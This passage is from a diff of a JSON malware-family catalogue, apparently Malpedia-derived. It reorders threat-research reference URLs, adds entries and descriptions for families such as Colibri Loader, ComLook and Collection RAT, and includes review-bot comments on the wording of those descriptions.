+ "https://redcanary.com/wp-content/uploads/2022/05/Gootloader.pdf",
+ "https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/",
+ "https://paper.seebug.org/1301/",
+ "https://www.prodaft.com/m/reports/WizardSpider_TLPWHITE_v.1.4.pdf",
+ "https://twitter.com/Cryptolaemus1/status/1407135648528711680",
+ "https://ti.qianxin.com/blog/articles/Operation-OceanStorm:The-OceanLotus-hidden-under-the-abyss-of-the-deep/",
+ "https://attackiq.com/2022/06/03/attack-graph-response-to-us-cert-aa22-152a-karakurt-data-extortion-group/",
+ 
"https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti/", + "https://unit42.paloaltonetworks.com/fireeye-red-team-tool-breach/", + "https://cpj.org/2021/02/vietnam-based-hacking-oceanlotus-targets-journalists", + "https://experience.mandiant.com/trending-evil-2/p/1", + "https://www.accenture.com/us-en/blogs/cyber-defense/karakurt-threat-mitigation", + "https://blog.lumen.com/zuorat-hijacks-soho-routers-to-silently-stalk-networks/", + "https://security.macnica.co.jp/blog/2022/05/iso.html", + "https://kienmanowar.wordpress.com/2021/09/06/quick-analysis-cobaltstrike-loader-and-shellcode/", + "https://www.trendmicro.com/en_us/research/21/d/hello-ransomware-uses-updated-china-chopper-web-shell-sharepoint-vulnerability.html", + "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf", + "https://www2.deloitte.com/content/dam/Deloitte/dk/Documents/Grabngo/Aarhus_miniseminar_291118.pdf", + "https://unit42.paloaltonetworks.com/hancitor-infections-cobalt-strike/", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/diving-deeper-into-the-kaseya-vsa-attack-revil-returns-and-other-hackers-are-riding-their-coattails/", + "https://www.trendmicro.com/en_us/research/22/f/black-basta-ransomware-operators-expand-their-attack-arsenal-wit.html", + "https://www.secureworks.com/research/threat-profiles/bronze-riverside", + "https://www.mandiant.com/resources/darkside-affiliate-supply-chain-software-compromise", + "https://www.mandiant.com/resources/sabbath-ransomware-affiliate", + "https://www.accenture.com/us-en/blogs/cyber-defense/double-extortion-campaigns", + "https://ak100117.medium.com/analyzing-cobalt-strike-powershell-payload-64d55ed3521b", + "https://us-cert.cisa.gov/ncas/alerts/aa21-265a", + "https://twitter.com/VK_Intel/status/1294320579311435776", + 
"https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/operation-drbcontrol-uncovering-a-cyberespionage-campaign-targeting-gambling-companies-in-southeast-asia", + "https://malwarelab.eu/posts/fin6-cobalt-strike/", + "https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations-wp.pdf", + "https://401trg.com/burning-umbrella/ ", + "https://thehackernews.com/2022/05/malware-analysis-trickbot.html", + "https://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf", + "https://news.sophos.com/en-us/2021/10/04/atom-silo-ransomware-actors-use-confluence-exploit-dll-side-load-for-stealthy-attack/", + "https://labs.sentinelone.com/inside-a-trickbot-cobaltstrike-attack-server/", + "https://asec.ahnlab.com/ko/19860/", + "https://www.mandiant.com/resources/blog/trojanized-windows-installers-ukrainian-government", + "https://twitter.com/TheDFIRReport/status/1356729371931860992", + "https://www.advintel.io/post/advintel-s-state-of-emotet-aka-spmtools-displays-over-million-compromised-machines-through-2022", + "https://www.huntress.com/blog/cybersecurity-advisory-vmware-horizon-servers-actively-being-hit-with-cobalt-strike", + "https://blog.truesec.com/2021/05/05/are-the-notorious-cyber-criminals-evil-corp-actually-russian-spies/", + "https://documents.trendmicro.com/assets/white_papers/wp-earth-baku-an-apt-group-targeting-indo-pacific-countries.pdf", + "https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan", + "https://threatpost.com/conti-ransomware-v-3-including-decryptor-leaked/179006/", + "https://go.recordedfuture.com/hubfs/reports/cta-2023-0330.pdf", + "https://github.com/AmnestyTech/investigations/tree/master/2021-02-24_vietnam", + "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-dianxun.pdf", + "https://www.sentinelone.com/blog/from-the-front-lines-peering-into-a-pysa-ransomware-attack/", + 
"https://www.cybercom.mil/Media/News/Article/3098856/cyber-national-mission-force-discloses-iocs-from-ukrainian-networks/", + "https://news.sophos.com/en-us/2021/05/18/the-active-adversary-playbook-2021/?cmp=37153", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://www.youtube.com/watch?v=pIXl79IPkLI", + "https://norfolkinfosec.com/jeshell-an-oceanlotus-apt32-backdoor/", + "https://r136a1.info/2022/05/25/introduction-of-a-pe-file-extractor-for-various-situations/", + "https://www.scmagazine.com/brief/breach/novel-obfuscation-leveraged-by-hive-ransomware", + "https://www.fireeye.com/blog/threat-research/2021/06/darkside-affiliate-supply-chain-software-compromise.html", + "https://www.youtube.com/watch?v=borfuQGrB8g", + "https://medium.com/walmartglobaltech/from-royal-with-love-88fa05ff7f65", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-011.pdf", + "https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/", + "https://research.nccgroup.com/2020/06/23/wastedlocker-a-new-ransomware-variant-developed-by-the-evil-corp-group/", + "https://www.secureworks.com/research/bronze-starlight-ransomware-operations-use-hui-loader", + "https://www.arashparsa.com/catching-a-malware-with-no-name/", + "https://blog.viettelcybersecurity.com/apt32-deobfuscation-arsenal-deobfuscating-mot-vai-loai-obfucation-toolkit-cua-apt32-phan-2/", + "https://thedfirreport.com/2020/10/08/ryuks-return/", + "https://twitter.com/th3_protoCOL/status/1433414685299142660?s=20", + "https://thedfirreport.com/2021/06/28/hancitor-continues-to-push-cobalt-strike/", + "https://www.telsy.com/legitimate-sites-used-as-cobalt-strike-c2s-against-indian-government/", + "https://isc.sans.edu/forums/diary/Emotet%20infection%20with%20Cobalt%20Strike/28824/", + "https://www.npu.gov.ua/news/kiberzlochini/kiberpolicziya-vikrila-transnaczionalne-zlochinne-ugrupovannya-u-nanesenni-inozemnim-kompaniyam-120-miljoniv-dolariv-zbitkiv/", + 
"https://unit42.paloaltonetworks.com/cloaked-ursa-online-storage-services-campaigns/", + "https://medium.com/walmartglobaltech/cobaltstrike-uuid-stager-ca7e82f7bb64", + "https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/", + "https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/", + "https://i.blackhat.com/USA-20/Thursday/us-20-Chen-Operation-Chimera-APT-Operation-Targets-Semiconductor-Vendors.pdf", + "https://www.carbonblack.com/2020/03/26/the-dukes-of-moscow/", + "https://community.riskiq.com/article/c88cf7e6", + "https://go.recordedfuture.com/hubfs/reports/cta-2023-0808.pdf", + "https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations.pdf", + "https://twitter.com/MsftSecIntel/status/1522690116979855360", + "https://twitter.com/Unit42_Intel/status/1461004489234829320", + "https://www.cybereason.com/blog/threat-analysis-report-datoploader-exploits-proxyshell-to-deliver-qbot-and-cobalt-strike", + "https://www.cynet.com/attack-techniques-hands-on/threats-looming-over-the-horizon/", + "https://thedfirreport.com/2021/06/20/from-word-to-lateral-movement-in-1-hour/", + "https://wbglil.gitbook.io/cobalt-strike/", + "https://www.contextis.com/en/blog/dll-search-order-hijacking", + "https://www.guidepointsecurity.com/yet-another-cobalt-strike-loader-guid-edition/", + "https://isc.sans.edu/diary/rss/26862", + "https://resource.redcanary.com/rs/003-YRU-314/images/2022_ThreatDetectionReport_RedCanary.pdf", + "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/", + "https://news.sophos.com/en-us/2021/05/05/intervention-halts-a-proxylogon-enabled-attack", + "https://isc.sans.edu/diary/28636", + "https://isc.sans.edu/diary/rss/28752", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-raindrop-malware", + 
"https://thedfirreport.com/2021/08/01/bazarcall-to-conti-ransomware-via-trickbot-and-cobalt-strike/", + "https://www.cynet.com/attack-techniques-hands-on/quakbot-strikes-with-quaknightmare-exploitation/", + "https://www.sekoia.io/en/nobeliums-envyscout-infection-chain-goes-in-the-registry-targeting-embassies/", + "https://isc.sans.edu/forums/diary/Qakbot+infection+with+Cobalt+Strike+and+VNC+activity/28448/", + "https://medium.com/cycraft/taiwan-high-tech-ecosystem-targeted-by-foreign-apt-group-5473d2ad8730", + "https://kienmanowar.wordpress.com/2022/06/04/quicknote-cobaltstrike-smb-beacon-analysis-2/", + "https://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility", + "https://www.varonis.com/blog/hive-ransomware-analysis", + "https://labs.sentinelone.com/hotcobalt-new-cobalt-strike-dos-vulnerability-that-lets-you-halt-operations/", + "https://www.accenture.com/us-en/blogs/cyber-defense/moving-left-ransomware-boom", + "https://mergene.medium.com/enterprise-scale-threat-hunting-network-beacon-detection-with-unsupervised-ml-and-kql-part-2-bff46cfc1e7e", + "https://www.trendmicro.com/en_us/research/21/i/examining-the-cring-ransomware-techniques.html", + "https://blog.exatrack.com/melofee/", + "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf", + "https://www.istrosec.com/blog/apt-sk-cobalt/", + "https://blog.bushidotoken.net/2022/06/overview-of-russian-gru-and-svr.html", + "https://blog.talosintelligence.com/2020/12/quarterly-ir-report-fall-2020-q4.html", + "https://www.wired.com/story/chinese-hackers-taiwan-semiconductor-industry-skeleton-key/", + "https://www.youtube.com/watch?v=XfUTpwZKCDU", + "https://www.incibe-cert.es/sites/default/files/contenidos/estudios/doc/incibe-cert_estudio_analisis_nobelium_2022_v1.pdf", + "https://michaelkoczwara.medium.com/cobalt-strike-hunting-simple-pcap-and-beacon-analysis-f51c36ce6811", + 
"https://www.crowdstrike.com/blog/how-falcon-complete-disrupts-ecrime-operators-wizard-spider/", + "https://www.arashparsa.com/hook-heaps-and-live-free/", + "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/787/original/ransomware-chats.pdf", + "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", + "https://redcanary.com/blog/grief-ransomware/", + "https://www.macnica.net/file/mpressioncss_ta_report_2019.pdf", + "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/growling-bears-make-thunderous-noise.html", + "https://blog.talosintelligence.com/2022/05/mustang-panda-targets-europe.html", + "https://www.cyborgsecurity.com/blog/you-dont-know-the-hafnium-of-it/", + "https://www.cisa.gov/uscert/ncas/alerts/aa22-249a", + "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v", + "https://unit42.paloaltonetworks.com/cobalt-strike-metadata-encoding-decoding/", + "https://www.malware-traffic-analysis.net/2021/09/29/index.html", + "https://5851803.fs1.hubspotusercontent-na1.net/hubfs/5851803/Russian%20Ransomware%20C2%20Network%20Discovered%20in%20Censys%20Data.pdf", + "https://blog.nviso.eu/2022/03/22/cobalt-strike-overview-part-7/", + "https://thedfirreport.com/2021/03/08/bazar-drops-the-anchor/", + "https://research.nccgroup.com/2022/03/31/conti-nuation-methods-and-techniques-observed-in-operations-post-the-leaks/", + "https://www.fireeye.com/blog/threat-research/2021/04/unc2447-sombrat-and-fivehands-ransomware-sophisticated-financial-threat.html", + "https://twitter.com/redcanary/status/1334224861628039169", + "https://redcanary.com/blog/getsystem-offsec/", + "https://www.accenture.com/us-en/blogs/security/ransomware-hades", + "https://mal-eats.net/en/2021/05/11/campo_new_attack_campaign_targeting_japan/", + "https://blog.nviso.eu/2021/10/27/cobalt-strike-using-known-private-keys-to-decrypt-traffic-part-2/", + "https://github.com/swisscom/detections/blob/main/RYUK/cobaltstrike_c2s.txt", + 
"https://intel471.com/blog/china-cybercrime-undergrond-deepmix-tea-horse-road-great-firewall/", + "https://tccontre.blogspot.com/2019/11/cobaltstrike-beacondll-your-not.html", + "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack" ], "synonyms": [ "Agentemis", @@ -18769,10 +19669,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cobian_rat", - "https://yoroi.company/research/the-wayback-campaign-a-large-scale-operation-hiding-in-plain-sight/", "https://www.zscaler.com/blogs/research/cobian-rat-backdoored-rat", - "https://cocomelonc.github.io/tutorial/2022/04/20/malware-pers-1.html", - "https://securityaffairs.co/wordpress/62573/malware/cobian-rat-backdoor.html" + "https://securityaffairs.co/wordpress/62573/malware/cobian-rat-backdoor.html", + "https://yoroi.company/research/the-wayback-campaign-a-large-scale-operation-hiding-in-plain-sight/", + "https://cocomelonc.github.io/tutorial/2022/04/20/malware-pers-1.html" ], "synonyms": [], "type": [] 
@@ -18785,15 +19685,15 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.cobint",
+ "https://www.proofpoint.com/us/threat-insight/post/new-modular-downloaders-fingerprint-systems-part-3-cobint",
+ "https://www.group-ib.com/blog/renaissance",
+ "https://www.netscout.com/blog/asert/double-infection-double-fun",
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/cobalt_upd_ttps/",
 "https://asert.arbornetworks.com/double-the-infection-double-the-fun/",
 "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
 "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
- "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/cobalt_upd_ttps/",
- "https://www.netscout.com/blog/asert/double-infection-double-fun",
- "https://www.group-ib.com/blog/renaissance",
- "https://www.proofpoint.com/us/threat-insight/post/new-modular-downloaders-fingerprint-systems-part-3-cobint",
- "https://www.secureworks.com/research/threat-profiles/gold-kingswood",
- "http://www.secureworks.com/research/threat-profiles/gold-kingswood"
+ "http://www.secureworks.com/research/threat-profiles/gold-kingswood",
+ "https://www.secureworks.com/research/threat-profiles/gold-kingswood"
 ],
 "synonyms": [
 "COOLPANTS"
@@ -18808,22 +19708,22 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.cobra",
- "https://github.com/hfiref0x/TDL",
+ "https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity",
+ "https://www.welivesecurity.com/2017/03/30/carbon-paper-peering-turlas-second-stage-backdoor/",
 "https://blog.gdatasoftware.com/2015/01/23926-analysis-of-project-cobra",
+ "https://docs.broadcom.com/doc/waterbug-attack-group",
+ "https://www.govcert.ch/downloads/whitepapers/Report_Ruag-Espionage-Case.pdf",
+ "https://www.circl.lu/pub/tr-25/",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
+ "https://www-west.symantec.com/content/dam/symantec/docs/security-center/white-papers/waterbug-attack-group-16-en.pdf",
+ "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-129a",
+ "https://github.com/hfiref0x/TDL",
+ "https://securelist.com/analysis/publications/65545/the-epic-turla-operation/",
+ "https://securelist.com/shedding-skin-turlas-fresh-faces/88069/",
 "https://www.melani.admin.ch/dam/melani/de/dokumente/2016/technical%20report%20ruag.pdf.download.pdf/Report_Ruag-Espionage-Case.pdf",
 "https://www.secureworks.com/research/threat-profiles/iron-hunter",
- "https://www.circl.lu/pub/tr-25/",
- "https://securelist.com/shedding-skin-turlas-fresh-faces/88069/",
- "https://www-west.symantec.com/content/dam/symantec/docs/security-center/white-papers/waterbug-attack-group-16-en.pdf",
- "https://securelist.com/analysis/publications/65545/the-epic-turla-operation/",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
- "https://github.com/sisoma2/malware_analysis/tree/master/turla_carbon",
- "https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity",
- "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-129a",
- "https://www.govcert.ch/downloads/whitepapers/Report_Ruag-Espionage-Case.pdf",
- "https://docs.broadcom.com/doc/waterbug-attack-group",
 "https://www.youtube.com/watch?v=FttiysUZmDw",
- "https://www.welivesecurity.com/2017/03/30/carbon-paper-peering-turlas-second-stage-backdoor/"
+ "https://github.com/sisoma2/malware_analysis/tree/master/turla_carbon"
 ],
 "synonyms": [
 "Carbon"
@@ -18890,12 +19790,12 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.coinminer",
- "https://secrary.com/ReversingMalware/CoinMiner/",
 "https://www.triskelelabs.com/investigating-monero-coin-miner",
- "https://blog.malwarebytes.com/threat-analysis/2018/01/a-coin-miner-with-a-heavens-gate/",
- "https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html",
- "https://thedfirreport.com/2021/01/18/all-that-for-a-coinminer/",
 "https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/",
+ "https://blog.malwarebytes.com/threat-analysis/2018/01/a-coin-miner-with-a-heavens-gate/",
+ "https://secrary.com/ReversingMalware/CoinMiner/",
+ "https://thedfirreport.com/2021/01/18/all-that-for-a-coinminer/",
+ "https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html",
 "https://blog.malwarebytes.com/threat-analysis/2018/01/a-coin-miner-with-a-heavens-gate/amp/"
 ],
 "synonyms": [],
@@ -18922,8 +19822,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.coldlock",
- "https://www.trendmicro.com/en_us/research/20/i/u-s--justice-department-charges-apt41-hackers-over-global-cyberattacks.html",
- "https://medium.com/cycraft/china-linked-threat-group-targets-taiwan-critical-infrastructure-smokescreen-ransomware-c2a155aa53d5"
+ "https://medium.com/cycraft/china-linked-threat-group-targets-taiwan-critical-infrastructure-smokescreen-ransomware-c2a155aa53d5",
+ "https://www.trendmicro.com/en_us/research/20/i/u-s--justice-department-charges-apt41-hackers-over-global-cyberattacks.html"
 ],
 "synonyms": [],
 "type": []
@@ -18936,11 +19836,11 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.coldseal",
- "http://web.archive.org/web/20181007211751/https://myonlinesecurity.co.uk/return-of-fake-ups-cannot-deliver-malspam-with-an-updated-nemucod-ransomware-and-kovter-payload/",
- "https://web.archive.org/web/20190331091056/https://myonlinesecurity.co.uk/fake-cdc-flu-pandemic-warning-delivers-gandcrab-5-2-ransomware/",
+ "https://www.xylibox.com/2012/01/coldeal-situation-is-under-control.html",
 "https://www.youtube.com/watch?v=242Tn0IL2jE",
 "https://www.xylibox.com/2012/01/cracking-coldeal-541-fwb.html",
- "https://www.xylibox.com/2012/01/coldeal-situation-is-under-control.html"
+ "https://web.archive.org/web/20190331091056/https://myonlinesecurity.co.uk/fake-cdc-flu-pandemic-warning-delivers-gandcrab-5-2-ransomware/",
+ "http://web.archive.org/web/20181007211751/https://myonlinesecurity.co.uk/return-of-fake-ups-cannot-deliver-malspam-with-an-updated-nemucod-ransomware-and-kovter-payload/"
 ],
 "synonyms": [
 "ColdSeal"
@@ -18955,9 +19855,9 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.coldstealer",
+ "https://securelist.com/nullmixer-oodles-of-trojans-in-a-single-dropper/107498/",
 "https://asec.ahnlab.com/ko/31703/",
- "https://asec.ahnlab.com/en/32090/",
- "https://securelist.com/nullmixer-oodles-of-trojans-in-a-single-dropper/107498/"
+ "https://asec.ahnlab.com/en/32090/"
 ],
 "synonyms": [],
 "type": []
@@ -18966,16 +19866,16 @@
 "value": "ColdStealer"
 },
 {
- "description": "",
+ "description": "According to cloudsek, Colibri Loader is a form of malware designed to facilitate the installation of additional malware types on an already compromised system. This loader employs various techniques to evade detection, such as excluding the Import Address Table (IAT) and utilizing encrypted strings to complicate analysis. Similar to other loader malware, Colibri can be utilized to deploy information-stealing malware, potentially leading to significant loss of sensitive data. As a result, users should exercise caution when encountering unfamiliar files on their systems.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.colibri",
 "https://github.com/Casperinous/colibri_loader",
- "https://cloudsek.com/in-depth-technical-analysis-of-colibri-loader-malware/",
 "https://fr3d.hk/blog/colibri-loader-back-to-basics",
- "https://go.recordedfuture.com/hubfs/reports/cta-2022-0919.pdf",
+ "https://www.bitsight.com/blog/unpacking-colibri-loader-russian-apt-linked-campaign",
 "https://blog.malwarebytes.com/threat-intelligence/2022/04/colibri-loader-combines-task-scheduler-and-powershell-in-clever-persistence-technique/",
- "https://www.bitsight.com/blog/unpacking-colibri-loader-russian-apt-linked-campaign"
+ "https://cloudsek.com/in-depth-technical-analysis-of-colibri-loader-malware/",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2022-0919.pdf"
 ],
 "synonyms": [],
 "type": []
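Review bot: The Colibri Loader description added in the `@@ -18966,16 +19866,16 @@` hunk opens with `According to cloudsek,` and closes with end-user advice (`As a result, users should exercise caution ...`), which reads differently from the other descriptions this patch series adds, where the ComLook entry for instance is a plain factual summary. I would write the vendor name in its own casing, `According to CloudSEK,`, and drop the final advisory sentence, since the cluster's `description` field is consumed as threat-intel context rather than as guidance. The attribution itself is fine to keep: the cloudsek.com write-up is already present in `refs` in the same hunk.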
@@ -18983,13 +19883,26 @@
 "uuid": "09926538-a7a0-413b-bc7d-4b20a8f4b515",
 "value": "Colibri Loader"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.collection_rat",
+ "https://blog.talosintelligence.com/lazarus-collectionrat/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "6c6570f3-b407-458f-bb83-647c0b1f5dd9",
+ "value": "Collection RAT"
+ },
 {
 "description": "",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.collectorgoomba",
- "https://blog.bushidotoken.net/2022/11/detecting-and-fingerprinting.html",
- "https://www.vmray.com/cyber-security-blog/cutting-off-command-and-control-infrastructure-collectorgoomba-threat-bulletin/"
+ "https://www.vmray.com/cyber-security-blog/cutting-off-command-and-control-infrastructure-collectorgoomba-threat-bulletin/",
+ "https://blog.bushidotoken.net/2022/11/detecting-and-fingerprinting.html"
 ],
 "synonyms": [
 "Collector Stealer"
@@ -19005,8 +19918,8 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.colony",
 "https://twitter.com/anyrun_app/status/976385355384590337",
- "https://pastebin.com/GtjBXDmz",
- "https://secrary.com/ReversingMalware/Colony_Bandios/"
+ "https://secrary.com/ReversingMalware/Colony_Bandios/",
+ "https://pastebin.com/GtjBXDmz"
 ],
 "synonyms": [
 "Bandios",
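Review bot: The new `Collection RAT` entry in the `@@ -18983,13 +19883,26 @@` hunk lands with `"description": ""` even though one of the two `refs` it cites is a dedicated Talos write-up, so a one-sentence summary taken from that source would be cheap to add now and would make the entry findable by something other than its `value`. The Talos URL slug (`lazarus-collectionrat`) suggests a Lazarus association; if the source states it, that belongs in `description` rather than being inferable only from the link text. `synonyms` and `type` are left empty, which matches the surrounding entries, so nothing to change there.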
@@ -19048,11 +19961,14 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.comebacker",
- "https://norfolkinfosec.com/dprk-targeting-researchers-ii-sys-payload-and-registry-hunting/",
- "https://www.anquanke.com/post/id/230161",
 "https://www.microsoft.com/security/blog/2021/01/28/zinc-attacks-against-security-researchers/",
+ "http://blog.nsfocus.net/stumbzarus-apt-lazarus/",
 "https://norfolkinfosec.com/dprk-malware-targeting-security-researchers/",
- "https://www.comae.com/posts/pandorabox-north-koreans-target-security-researchers/"
+ "https://www.anquanke.com/post/id/230161",
+ "https://norfolkinfosec.com/dprk-targeting-researchers-ii-sys-payload-and-registry-hunting/",
+ "https://blog.google/threat-analysis-group/new-campaign-targeting-security-researchers/",
+ "https://www.comae.com/posts/pandorabox-north-koreans-target-security-researchers/",
+ "https://cn.ahnlab.com/global/upload/download/asecreport/ASEC%20REPORT_vol.102_ENG%20(4).pdf"
 ],
 "synonyms": [],
 "type": []
@@ -19074,12 +19990,12 @@
 "value": "Comfoo"
 },
 {
- "description": "",
+ "description": "ComLook is a malicious plugin for the mail client \"The Bat!\", written in C++ and compiled with MSVC 10.0. It implements malicious commands like PutFile, GetFile, SetConfig, GetConfig, and Command. It contains hard-coded email addresses and other information, indicating a target in Azerbaijan. It was first uploaded to VirusTotal on January 12, 2022, and is associated with the APT group Turla. It appears to be a targeted deployment.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.comlook",
- "https://www.msreverseengineering.com/blog/2022/1/25/an-exhaustively-analyzed-idb-for-comlook",
- "https://twitter.com/ClearskySec/status/1484211242474561540"
+ "https://twitter.com/ClearskySec/status/1484211242474561540",
+ "https://www.msreverseengineering.com/blog/2022/1/25/an-exhaustively-analyzed-idb-for-comlook"
 ],
 "synonyms": [],
 "type": []
@@ -19092,6 +20008,7 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.common_magic",
+ "https://securelist.com/cloudwizard-apt/109722/",
 "https://securelist.com/bad-magic-apt/109087/?s=31"
 ],
 "synonyms": [],
@@ -19119,11 +20036,11 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.compfun",
+ "https://securelist.com/compfun-successor-reductor/93633/",
 "https://securelist.com/it-threat-evolution-q2-2020/98230",
 "https://www.gdatasoftware.com/blog/2014/10/23941-com-object-hijacking-the-discreet-way-of-persistence",
 "https://securelist.com/apt-trends-report-q2-2019/91897/",
- "https://securelist.com/compfun-http-status-based-trojan/96874/",
- "https://securelist.com/compfun-successor-reductor/93633/"
+ "https://securelist.com/compfun-http-status-based-trojan/96874/"
 ],
 "synonyms": [
 "Reductor RAT"
@@ -19138,8 +20055,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.computrace",
- "https://www.lastline.com/labsblog/apt28-rollercoaster-the-lowdown-on-hijacked-lojack/",
 "https://bartblaze.blogspot.de/2014/11/thoughts-on-absolute-computrace.html",
+ "https://www.lastline.com/labsblog/apt28-rollercoaster-the-lowdown-on-hijacked-lojack/",
 "https://asert.arbornetworks.com/lojack-becomes-a-double-agent/",
 "https://www.secureworks.com/research/threat-profiles/iron-twilight"
 ],
@@ -19169,8 +20086,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.concealment_troy",
- "https://www.mcafee.com/enterprise/en-us/assets/white-papers/wp-dissecting-operation-troy.pdf",
- "http://www.malware-reversing.com/2013/04/5-south-korea-incident-new-malware.html"
+ "http://www.malware-reversing.com/2013/04/5-south-korea-incident-new-malware.html",
+ "https://www.mcafee.com/enterprise/en-us/assets/white-papers/wp-dissecting-operation-troy.pdf"
 ],
 "synonyms": [],
 "type": []
@@ -19183,15 +20100,15 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.conficker",
- "https://github.com/tillmannw/cnfckr",
- "https://github.com/itaymigdal/malware-analysis-writeups/blob/main/Conficker/Conficker.md",
- "https://www.minitool.com/backup-tips/conficker-worm.html",
- "http://contagiodump.blogspot.com/2009/05/win32conficker.html",
- "https://redcanary.com/blog/intelligence-insights-january-2022/",
- "http://www.csl.sri.com/users/vinod/papers/Conficker/addendumC/index.html",
- "https://www.sophos.com/fr-fr/medialibrary/PDFs/marketing%20material/confickeranalysis.pdf",
 "https://www.kaspersky.com/about/press-releases/2009_kaspersky-lab-analyses-new-version-of-kido--conficker",
- "https://web.archive.org/web/20160616170611/https://media.blackhat.com/bh-eu-10/presentations/Carrera_Silberman/BlackHat-EU-2010-Carrera-Silberman-State-of-Malware-slides.pdf"
+ "https://redcanary.com/blog/intelligence-insights-january-2022/",
+ "https://www.minitool.com/backup-tips/conficker-worm.html",
+ "https://github.com/itaymigdal/malware-analysis-writeups/blob/main/Conficker/Conficker.md",
+ "http://www.csl.sri.com/users/vinod/papers/Conficker/addendumC/index.html",
+ "https://web.archive.org/web/20160616170611/https://media.blackhat.com/bh-eu-10/presentations/Carrera_Silberman/BlackHat-EU-2010-Carrera-Silberman-State-of-Malware-slides.pdf",
+ "https://www.sophos.com/fr-fr/medialibrary/PDFs/marketing%20material/confickeranalysis.pdf",
+ "https://github.com/tillmannw/cnfckr",
+ "http://contagiodump.blogspot.com/2009/05/win32conficker.html"
 ],
 "synonyms": [
 "Kido",
@@ -19209,9 +20126,9 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.confucius",
 "https://researchcenter.paloaltonetworks.com/2016/09/unit42-confucius-says-malware-families-get-further-by-abusing-legitimate-websites/",
- "https://www.uptycs.com/blog/confucius-apt-deploys-warzone-rat",
 "https://researchcenter.paloaltonetworks.com/2017/11/unit42-recent-inpage-exploits-lead-multiple-malware-families/",
- "https://www.trendmicro.com/en_us/research/21/h/confucius-uses-pegasus-spyware-related-lures-to-target-pakistani.html"
+ "https://www.trendmicro.com/en_us/research/21/h/confucius-uses-pegasus-spyware-related-lures-to-target-pakistani.html",
+ "https://www.uptycs.com/blog/confucius-apt-deploys-warzone-rat"
 ],
 "synonyms": [],
 "type": []
@@ -19224,197 +20141,203 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.conti",
